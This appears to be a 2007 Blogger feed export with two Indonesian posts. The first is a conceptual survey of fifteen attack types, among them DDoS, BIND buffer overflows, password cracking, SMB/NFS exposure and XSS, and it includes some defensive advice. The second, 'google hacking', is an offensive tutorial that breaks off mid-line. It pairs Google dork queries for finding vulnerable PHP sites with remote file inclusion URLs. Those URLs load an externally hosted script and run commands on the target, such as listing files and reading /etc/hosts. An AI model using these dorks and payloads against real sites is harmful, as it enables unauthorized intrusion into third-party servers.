tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bias membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.&lt;br /&gt;&lt;br /&gt;Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow.&lt;br /&gt;&lt;br /&gt;Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam system.&lt;br /&gt;&lt;br /&gt;Unix Finger Exploits&lt;br /&gt;&lt;br /&gt;Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.&lt;br /&gt;&lt;br /&gt;Flooding &amp; Broadcasting&lt;br /&gt;&lt;br /&gt;Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bias menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.&lt;br /&gt;&lt;br /&gt;Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.&lt;br /&gt;&lt;br /&gt;Attacker sering kali menggunakan serangan flooding ini untuk mendapatkan akses ke system yang digunakan untuk menyerang network lainnya dalam satu serangan yang dinamakan Distributed Denial Of Service(DDOS). Serangan ini seringkali dipanggil smurf jika dikirim melaluli ICMP dan disebut fraggles ketika serangan ini dijalakan melewati UDP.&lt;br /&gt;&lt;br /&gt;Suatu node (dijadikan tools) yang menguatkan broadcast traffic sering disebut sebagai Smurf Amplifiers, tools ini sangat efektif untuk menjalankan serangan flooding. Dengan melakukan spoofing terhadap network sasaran, seorang attacker dapat mengirim sebuah request ke smurf amplifier, Network yang di amplifiying(dikuatkan) akan mengirim respon kesetiap host di dalam network itu sendiri, yang berarti satu request yang dilakukan oleh attacker akan menghasilkan pekerjaan yang sama dan berulang-ulang pada network sasaran, hasil dari serangan ini adalah sebuah denial of service yang tidak meninggalkan jejak. Serangan ini dapat diantisipasi dengan cara menolak broadcast yang diarahkan pada router.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;TCP-level Flooding (kebanyakan SYN ATTACK) telah digunakan pada bulan februari tahun 2000 untuk menyerang Yahoo!, eBay dll yang menggunakan serangan DDOS(Distributed Denial Of Service). Network yang tidak menggunakan firewall untuk pengecekan paket-paket TCP biasanya bisa diserang dengan cara ini.&lt;br /&gt;&lt;br /&gt;Beberapa fungsi penyaringan pada firewall (Firewall Filtering Function) biasanya akan mampu untuk menahan satu serangan flooding dari sebuah alamat IP, tetapi serangan yang dilakukan melalui DDOS akan sulit di cegah karena serangan ini seperti kita ketahui datangnya dari berbagai alamat IP secara berkala. Sebenarnya salah satu cara untuk menghentikan serangan DDOS adalah dengan cara mengembalikan paket ke alamat asalnya atau juga dengan cara mematikan network(biasanya dilakukan oleh system yang sudah terkena serangan sangat parah).&lt;br /&gt;&lt;br /&gt;Fragmented Packet Attacks&lt;br /&gt;&lt;br /&gt;Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.&lt;br /&gt;&lt;br /&gt;Paket yang dipecah juga dapat mengakibatkan suasana seperti serangan flooding. Karena paket yang dipecah akan tetap disimpan hingga akhirnya di bentuk kembali ke dalam data yang utuh, server akan menyimpan paket yang dipecah tadi dalam memori kernel. Dan akhirnya server akan menjadi crash jika terlalu banyak paket-paket yang telah dipecah dan disimpan dalam memory tanpa disatukan kembali. Melalui cara enumerasi tentang topographi network sasaran, seorang attacker bisa mempunyai banyak pilihan untuk meng- crash packet baik dengan cara menguji isi firewall, load balancers atau content – based routers. Dengan tidak memakai system pertahanan ini, network sasaran jauh lebih rawan untuk perusakan dan pembobolan.&lt;br /&gt;&lt;br /&gt;Karena paket yang dipecah(fragmented packet) tidak dicatat dalam file log sebelum disatukan kembali menjadi data yang utuh, packet yang dipecah ini memberikan jalan bagi hacker untuk masuk ke network tanpa di deteksi. Telah banyak Intrusion Detection System (IDS) dan saringan firewall(firewall filters) yang memperbaiki masalah ini, tapi masih banyak juga system yang masih dapat ditembus dengan cara ini.&lt;br /&gt;&lt;br /&gt;E-mail Exploits&lt;br /&gt;&lt;br /&gt;Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).&lt;br /&gt;&lt;br /&gt;Serangan mail flood (flood =air bah) terjadi ketika banyak sekali e-mail yang dikirimkan oleh attacker kepada sasaran yang mengakibatkan transfer agent kewalahan menanganinya, mengakibatkan komunikasi antar program lain menjadi tidak stabil dan dapat membuat system menjadi crash. Melakukan flooding merupakan cara yang sangat kasar namun efektif, maksudnya untuk membuat suatu mail server menjadi down. Salah satu jalan yang menarik dalam melakukan serangan mail-flooding adalah dengan mengexploitasi fungsi auto-responder (auto-responder function) yang terdapat dalam kebanyakan aplikasi email, ketika seorang attacker menemukan auto-responder yang sedang aktif dalam dua system yang berbeda, sang attacker bisa saja mengarahkan yang satu ke yang lainnya, karena kedua-duanya di set untuk merespond secara sacara otomatis untuk setiap pesan, maka kedua-duanya akan terus mengenarate lebih banyak e-mail secara loop(bolak-balik) dan akhirnya kedua-duanya akan kelelahan dan down.&lt;br /&gt;&lt;br /&gt;Serangan memanipulasi perintah (command manipulation attack) dapat mengakibatkan sebuah system menjadi crash dengan cara menggulingkan mail transfer agent dengan sebuah buffer overflow yang diakibatkan oleh perintah (fungsi) yang cacat (contoh: EXPN atau VRFY). Perbedaan antara mail flood dan command manipulation: command manipulation meng-exploit kekuasaan milik sendmail yaitu memperbolehkan attacker untuk mengakses system tanpa informasi otorisasi(menjadi network admin tanpa diketahui) dan membuat modifikasi pada penjalanan program lainnya. Mengaktifkan command yang cacat seperti diatas juga dapat mengakibatkan seorang attacker mendapatlan akses untuk memodifikasi file, menulis ulang, dan tentunya saja membuat trojan horses pada mail server.&lt;br /&gt;&lt;br /&gt;Penyerangan tingkat transport (transport level attack) dilakukan dengan cara mengexploit protokol perute-an/pemetaan e-mail diseluruh internet: Simple Mail Tranport Protocol (SMTP). Seorang attacker dapat mengakibatkan kondisi kesalahan sementara (temporary error) di target system dengan cara mengoverload lebih banyak data pada SMTP buffer sehingga SMTP buffer tidak bisa menanganinya, kejadian ini dapat mengakibatkan seorang attacker terlempar dari sendmail program dan masuk kedalam shell dengan kekuasaan adminitsrasi bahkan dapat mengambil alih root. Beberapa serangan exploitasi juga sering terjadi pada POP dan IMAP.&lt;br /&gt;&lt;br /&gt;Pada saat kerawanan SMTP sulit untuk di exploitasi, attacker mungkin saja berpindah ke serangan tranport level jika ia tidak berhasil menyerang dengan cara command manipulation ataupun mail-flood. Serangan ini lebih digunakan untuk membuat gangguan daripada untuk menjebol suatu system. Seorang attacker biasanya akan menggunakan serangan jenis untuk mem flood Exchange Server dan memotong lalu lintas e-mail (trafic e-mail). Serangan ini juga dapat digunakan untuk membuat reputasi suatu organisasi menjadi buruk dengan mengirimkan spam atau offensive e-mail ke organisasi lainnya dengan sumber dan alamat dari organisasi tersebut.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Mail relaying, proses memalsukan asal/source email dengan cara meroutekannya ke arah mesin yang akan dibohongi, adalah type lain dari serangan transport-level. Teknik ini sangat berguna untuk membuat broadcasting spam secara anonymous. Berbagai macam isi(content) yang sering dikirim lewat e-mail. dengan teknik ini biasanya adalah content-content yang merusak. Beberapa Virus dan Worms akan disertakan dalam e-mail sebagai file attachment yang sah, seperti variant Melissa yang nampak sebagai Ms Word Macro atau loveletter worm yang menginfeksi system dan mengemailkan dirinya sendiri ke users yang berada dalam address booknya outlook. Kebanyakan antivirus scanner akan menangkap attachment seperti ini, tetapi visrus dan worm baru serta variannya masih tetap berbahaya.&lt;br /&gt;&lt;br /&gt;Serangan yang terakhir yang dilakukan oleh seorang attacker selain serangan diatas adalah dengan cara melakukan social enginering, kadang sang attacker mengirim e-mail dengan source memakai alamat admin agar users mengirimkan passwordnya untuk mengupgrade system.&lt;br /&gt;&lt;br /&gt;DNS and BIND Vulnerabilities&lt;br /&gt;&lt;br /&gt;Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).&lt;br /&gt;&lt;br /&gt;Kesalahan pada BIND sebenarnya bukanlah sesuatu yang baru. Semenjak permulaanya, standar BIND merupakan target yang paling favorite untuk diserang oleh komunitas cracker karena beberapa kerawanannya. Empat kerawanan terhadap buffer overflow yang terjadi pada bulan Januari lalu hanya beberapa bagian dari kerawanan untuk diexploitasi oleh para cracker agar mendapat akses terhadap system dan melakukan perintah dengan hak penuh (command execution priviledge).&lt;br /&gt;&lt;br /&gt;Kerawanan pada BIND merupakan masalah yang sangat serius karena lebih dari 80 persen DNS yang berada di Jagat Internet dibangun menggunakan BIND. Tanpa adanya DNS dalam lingkungan Internet Modern, mungkin transmisi e-mail akan sulit, navigasi ke situs-situs web terasa rumit dan mungkin tidak ada hal mudah lainnya yang menyangkut internet.&lt;br /&gt;&lt;br /&gt;Kerawanan BIND bukan hanya terletak pada DNS. System penerjemah alamat (number-address translator) merupakan subject dari kebanyakan exploit, termasuk untuk melakukan penyerangan di tingkat informasi, penyerangan Denial Of Service, pengambil alihan kekuasaan dengan hijacking. Penyerangan di tingkat Informasi bertujuan untuk membuat server menjawab sesuatu yang lain dari jawaban yang benar. Salah satu cara untuk melakukan serangan jenis ini adalah melalui cache poisoning, yang mana akan mengelabui remote name server agar menyimpan jawaban dari third-party domain dengan cara menyediakan berbagai macam informasi kepada domain server yang mempunyai autorisasi. Semua pengimplementasian serangan terhadap DNS akan mempunyai kemungkinan besar untuk berhasil dilakukan jika jawaban dari suatu pertanyaan yang spesisfik bisa dibohongi (spoof).&lt;br /&gt;&lt;br /&gt;DOS atau membuat Server tidak dapat beroperasi, bisa dilakukan dengan cara membuat DNS menyerang dirinya sendiri atau juga dengan cara mengirimkan traffic-flooding yang berlebihan dari luar, contohnya menggunakan “Smurf” ICMP flood. Jika suatu organisasi atau perusahaan memasang authoritathive name server dalam satu segment yang terletak dibelakang satu link atau dibelakang satu physical area, maka hal ini akan menyebabkan suatu kemungkinan untuk dilakukannya serangan Denial Of Service.Cracker akan mencoba untuk menyerang system melalui DNS dengan cara buffer overflow, yaitu salah&lt;br /&gt;satu exploit yang sangan berpotensi pada kerawanan BIND. Gangguan exploit terjadi karena adanya kelemahan dalam pengkodean/pemrograman BIND yang mengizinkan seorang attacker untuk memanfaatkan code-code yang dapat dieksekusi untuk masuk kedalam system. Beberapa system operasi telah menyediakan patch untuk stack agar tidak dapat dieksekusi, sebagaimana juga yang dilakukan compiler (menyediakan patch) yang melindungi stack dari overflow. Mekanisme perlindungan ini stidaknya membuat cracker akan sulit menggunakan exploit.&lt;br /&gt;&lt;br /&gt;Telah jelas bahwa mengupdate system secara berkala dan menggunakan patch adalah salah satu yang harus dilakukan untuk membangun security yang efektif, jika vendor dari DNS anda tidak menyediakan patch secara berkala, anda lebih baik mengganti software DNS anda yang menyediakan patch secara berkala, tentunya untuk menjaga kemanan system. Pada system Unix , BIND harus dijalankan sebagai root untuk mengatur port yang lebih rendah (kodekode mesin). Jika software DNS dapat dibodohi untuk menjalankan code-code berbahaya, atau membuka file-file milik root, user local mungkin saja bisa menaikan kekuasaannya sendiri didalam mesin. Organisasi atau perusahaan yang mengubah authoritative server juga harus waspada bahwa mengganti server mereka dalam waktu yang bersamaan akan mengakibatkan domain mereka di hijack melalui cache poisoning. Mengubah server seharusnya dilakukan sebagai proses transisi. Untuk mencegah domain hijacking sebaiknya network admin terlebih dahulu menambahkn server barunya kedalam network infrastucture sebelum mengganti server yang lama.&lt;br /&gt;&lt;br /&gt;Password Attacks&lt;br /&gt;&lt;br /&gt;Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing. Penebakan(guessing) password bisa dilakukan dengan cara memasukan password satu persatu secara manual ataupun dengan bantuin script yang telah diprogram. Kebanyakan user menggunakan hal-hal yang umum untuk password mereka diantaranya tanggal lahir, dan biasanya user tidak menghawatirkan tentang aturan yang berlaku pada perusahaan untuk menggunakan kombinasi alphanumeric dan minimal 7 karakter. Jika saja user memakai tanggal lahirnya sebagai password maka hal penyerangan akan sangat mudah dilakukan, karena cracker tidak membutuhkan waktu yang lama hanya untuk menjebol 6 digit angka tanggal lahir. Beberapa user atau bahkan administrator dapat membuat pekerjaan cracker menjadi mudah andai saja mereka lupa untuk merubah password default dari sebuah software.&lt;br /&gt;&lt;br /&gt;Sebenarnya, password guessing merupakan sesuatu yang sangat tidak efektif, dan dapat menghabiskan waktu. Network admin bisa dengan mudah mendetect serangan jika seorang attacker mencoba login dengan menebak password berkali-kali. Brute-force merupakan serangan yang menggunakan logika yang sama dengan password guessing tetapi serangan brute-force lebih cepat dan lebih powerfull. Dalam tipe serangan ini seorang attacker menggunakan script (biasanya program cracking gratis) yang akan mencoba password-password umum(biasanya terdapat dalam dictionary). Tujuan dari serangan jenis ini adalah untuk mempercepat penemuan password sebelum network admin menyadari adanya serangan. Walaupun serangan Brute-force lebih efisien daripada password guessing, kedua teknik tersebut pada dasarnya sama. Attacker umumnya lebih sulit untuk berhasil dengan kedua metoda tersebut. Lebih jauh lagi, kedua teknik tersebut sangat mudah di lawan dengan memanfaatkan features blacklisting, yang akan mengunci sebuah account user jika seseorang(attacker) berkali-kali memasukkan password secara tidak tepat. Contohnya, default blacklist dalam system unix adalah tiga kali (kesempatan memasukkan password).&lt;br /&gt;&lt;br /&gt;Kelemahan dari perlindungan blacklist adalah bahwa feature blacklist ini dapat igunkan untuk menyerang system oleh attacker. Sebagai contoh, jika seorang attacker dapat mengidentifikasi siapa login name untuk network admin, sang attacker bisa saja menngunakan login name itu dan memasukkan password yang salah berulangkali dan akhirnya mengunci account admin ☺. Ketika sang admin sedang berusaha untuk mendapatkan aksesnya kembali, seorang attacker masih bisa untuk berhubungan dengan system. Password cracking adalah metoda untuk melawan perlindungan password yang dienkripsi yang berada di dalam system. Dengan anggapan bahwa atacker telah masuk kedalam system, ia bisa saja mengubah kekuasaannya didalam system dengan cara meng crack password file menggunakan metode brute-forcedictionary attack (mencocokan kata-kata yang berada dalam kamus dengan kata-kata yang dienkripsi dalam file password). Keberhasilan menggunakan cara ini bergantung pada kecepatan prosesor dan&lt;br /&gt;program yang dimiliki oleh attacker. Cara yang terbaik untuk menghindari serangan jenis ini adalah dengan memonitor kewenangan akses pada file.&lt;br /&gt;&lt;br /&gt;Dengan cara mengintip lalulintas pada port telnet(23) ataupun HTTPD (80), seorang attacker dapat mendapatkan password yang digunakan untuk internet dan koneksi secara remote melalui proses yang dinamakan password snifing. Cara inilah yang paling mudah dilakukan karena kedua koneksi tersebut tidak menggunakan enkripsi, kecuali koneksi yang menggunakan SSL (secure socket layer) pada HTTPD(biasanya ada tanda gembok terkunci dibawah browser, yang menandakan transaksi aman) atau juga menggunakan SSH (Secure SHell) untuk koneksi ke mesin lain secara remote.&lt;br /&gt;&lt;br /&gt;9. Proxy Server Attacks&lt;br /&gt;&lt;br /&gt;Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam system saya akan bisa juga saya lakukan dalam system anda dan sebaliknya. Jika firewal yang berada dalam trusted network tidak dikonfigurasikan secara optimal, khususnya untuk memblok akses dari luar, apalagi jika autentikasi dan enkripsi tidak digunakan, seorang attacker bias menyerang proxy server dan mendapatkan akses yang sama dengan anggota trusted network lainnya. Jika attaker sudah masuk ke sistem ia tentunya bisa melakukan apa saja dan ia bisa melakukan DDOS(distributed denial of service) secara anoymous untuk menyerang network lain. Router yang tidak dikonfigurasikan secara optimal juga akan berfungsi sebagai proxy server dan akan mengakibatkan kerawanan yang sama dengan proxy server.&lt;br /&gt;&lt;br /&gt;10. Remote Command Processing Attacks&lt;br /&gt;&lt;br /&gt;Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network). Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.&lt;br /&gt;&lt;br /&gt;11. Remote File System Attack&lt;br /&gt;&lt;br /&gt;Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file. Tergantung pada OS (operating system) yang digunakan, attacker bisa meng extrack informasi tentang network, sharing privileges, nama dan lokasi dari user dan groups, dan spesifikasi dari aplikasi atau banner (nama dan versi software). System yang dikonfigurasi atau diamankan secara minimal akan dengan mudah membeberkan informasi ini bahkan melalui firewall sekalipun. Pada system UNIX, informasi ini dibawa oleh NFS (Network File System) di port 2049. system Windows menyediakan data ini pada SMB (server messaging block) dan Netbios pada port 135 - 139(NT) dan port 445 pada win2k.Network administrator bisa meminimalisasi resiko yang akan terjadi dengan menggunakan Protokolprotokol&lt;br /&gt;tersebut dengan memberikan sedikit peraturan. Network dengan system windows, harusnya memblok akses ke port 139 dan 445 dari luar network, jika dimungkinkan. Dalam system unix port 2049 seharusnya di blok, sharing file dibatasi dan permintaan file melalui showmount(perintah dalam unix) seharusnya di catat dalam log.&lt;br /&gt;&lt;br /&gt;12. Selective Program Insertions&lt;br /&gt;&lt;br /&gt;Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ☺) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor. Biasanya antivirus yang dijual dipasaran akan dapat mendeteksi dan membersihkan program-program seperti ini, tetapi jika ada virus baru (anggap saja variant melissa) virus scanner belum tentu dapat menghadapi script-script baru. Beberapa network administrator melakukan pertahan terhadap malware dengan teknologi alternatif seperti behaviour blockers, yang memberhentikan kode-kode yang dicurigai berdasarkan contoh kelakuan malware, bukan berdasarkan signature. Beberapa aplikasi lainnya akan mengkarantina virus dan code-code yang dicurigai didalam daerah yang dilindungi, biasanya disebut sandboxes.&lt;br /&gt;&lt;br /&gt;13. Port Scanning&lt;br /&gt;&lt;br /&gt;Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.&lt;br /&gt;&lt;br /&gt;14. TCP/IP Sequence Stealing, Passive Port Listening and Packet&lt;br /&gt;Interception&lt;br /&gt;&lt;br /&gt;TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like. TCP/IP Sequence Stealing adalah pemetaan dari urutan nomor-nomor (angka), yang bisa membuat packet milik attacker terlihat legal. Ketika suatu system meminta sesi terhadap mesin lain, kedua system tersebut saling bertukar nomor-nomor sinkronisasi TCP. Jika tidak dilakukan secara acak, Attacker bisa mengenali algoritma yang digunakan untuk meng –generate nomor-nomor ini. Urutan nomor yang telah dicuri bias digunakan attacker untuk menyamar menjadi salah satu dari system tadi, dan akhirnya memperbolehkannya untuk melewati firewall. Hal ini sebenarnya efektif jika digunakan bersama IP Spoofing.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Melalui passive port listening, seorang attacker dapat memonitor dan mencatat (log) semua pesan dan file yang dikirim ke semua port yang dapat diakses pada target system untuk menemukan titik kerawanan. Packet Interception adalah bagian (tepatnya pelapis) dari active listener program yang berada pada port di system sasaran yang berfungsi untuk menerima ataupun mengembalikan semua tipe pesan (data) spesifik yang dikirim. Pesan tersebut bisa dikembalikan ke unauthorized system, dibaca dan akhir nya dikembalikan lagi baik tanpa perubahan atau juga dengan perubahan kepada attacker, atau bahkan tidak dikembalikan. Dalam beberapa versi atau juga menurut konfigurasi dari user SSHD(secured shell daemon), otentikasi bisa dilakukan dengan cara menggunakan public key (milik mesin tentunya). Jika seorang attacker mempelajari public key yang digunakan, ia bisa menciptakan atau memasukan paket-paket palsu. System sasaran akan menganggap pengirim paket palsu tersebut mempunyai hak akses.&lt;br /&gt;&lt;br /&gt;15. HTTPD Attacks&lt;br /&gt;&lt;br /&gt;Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods. HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.&lt;br /&gt;Beberapa feature dari HTTPD bisa digunakan untuk meciptakan HTTPD byapass, memberi akses ke server menggunakan fungsi logging. Dengan cara ini, sebuah halaman web bisa diakses dan diganti tanpa dicatat oleh web server. Cara ini sering digunakan oleh para cracker, hacktivis dan cyber vandals untuk mendeface website. Sedangkan kerawanan pada script-script web bisa terjadi pada semua bahasa pemrograman web dan&lt;br /&gt;semua ekstensi aplikasi. Termasuk VB, Visual C++, ASP, TCL, Perl, PHP, XML, CGI dan Coldfusion. Pada dasarnya, attacker akan mengexploitasi kelemahan dari sebuah aplikasi, seperti CGI script yang tidak memeriksa input atau kerawanan pada IIS RDS pada showcode.asp yang mengizinkan menjalankan perintah secara remote (remote command priviledges). Melalui cross scripting dan cross-site scripting seorang attacker bisa mengexploitasi pertukaran cookies antara browser dan webserver. Fasilitas ini dapat mengaktifkan script untuk merubah tampilan web dll. Script ini bisa menjalankan malware, membaca infomasi penting dan meng expose data sensitive seperti nomor credit card dan password. Pada akhirnya attacker dapat menjalankan denial of service dengan URL flood, yang dilakukan dengan cara mengulang dan terus mengulang permintaan terhadap port 80 httpd yang melalui batas TTL (time to live). Beberapa user ataupun manager mungkin benci mendengar serangan-serangan tersebut. Tapi pada kenyataanya memang tidak ada yang benar-benar fix untuk mengamankan network ataupun website. Keamanan adalah suatu proses, bukan produk. Jika anda memasang firewall, IDSes(instrusion detection system), routers dan honeypots (system untuk jebakan) mungkin dapat menyediakan lapisan-lapisan untuk bertahan, tetapi sekali lagi peralatan paling canggih di dunia tidak akan menolong suatu organisasi sampai organisasi tersebut mempunyai proses untuk mengupgrade system, memakai patch, mengecek security pada system sendiri dan metode lain. Telah banyak perusahaan yang memakai IDSes tetapi tidak memonitor file log, mereka menginstall firewall, tetapi tidak mengupgradenya. Jalan terbaik untuk melindungi website maupun network dari serangan adalah mendekatkan keamanan sebagaimana tantangan yang sedang terjadi terhadap keamanan&lt;br /&gt;itu sendiri, terus berusaha, selalu ingat basicnya dan jangan lupa untuk berdoa...Smile&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sumber : www.IlmuKomputer.Com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-7221992551555709163?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/7221992551555709163'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/7221992551555709163'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/15-jenis-serangan-cracker.html' title='15 Jenis Serangan Cracker'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-584583370205937834</id><published>2007-09-27T16:55:00.000+07:00</published><updated>2007-09-27T17:01:47.067+07:00</updated><title type='text'>google hacking</title><content type='html'>1. allinurl filename&lt;br /&gt;bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”.&lt;br /&gt;keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:&lt;br /&gt;” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “&lt;br /&gt;kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.&lt;br /&gt;&lt;br /&gt;2. allinurl content&lt;br /&gt;bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”.&lt;br /&gt;keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:&lt;br /&gt;” http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “&lt;br /&gt;kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.&lt;br /&gt;&lt;br /&gt;3. allinurl page&lt;br /&gt;bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”.&lt;br /&gt;‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:&lt;br /&gt;http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=ls -al;uname -ar;id;pwd;cat 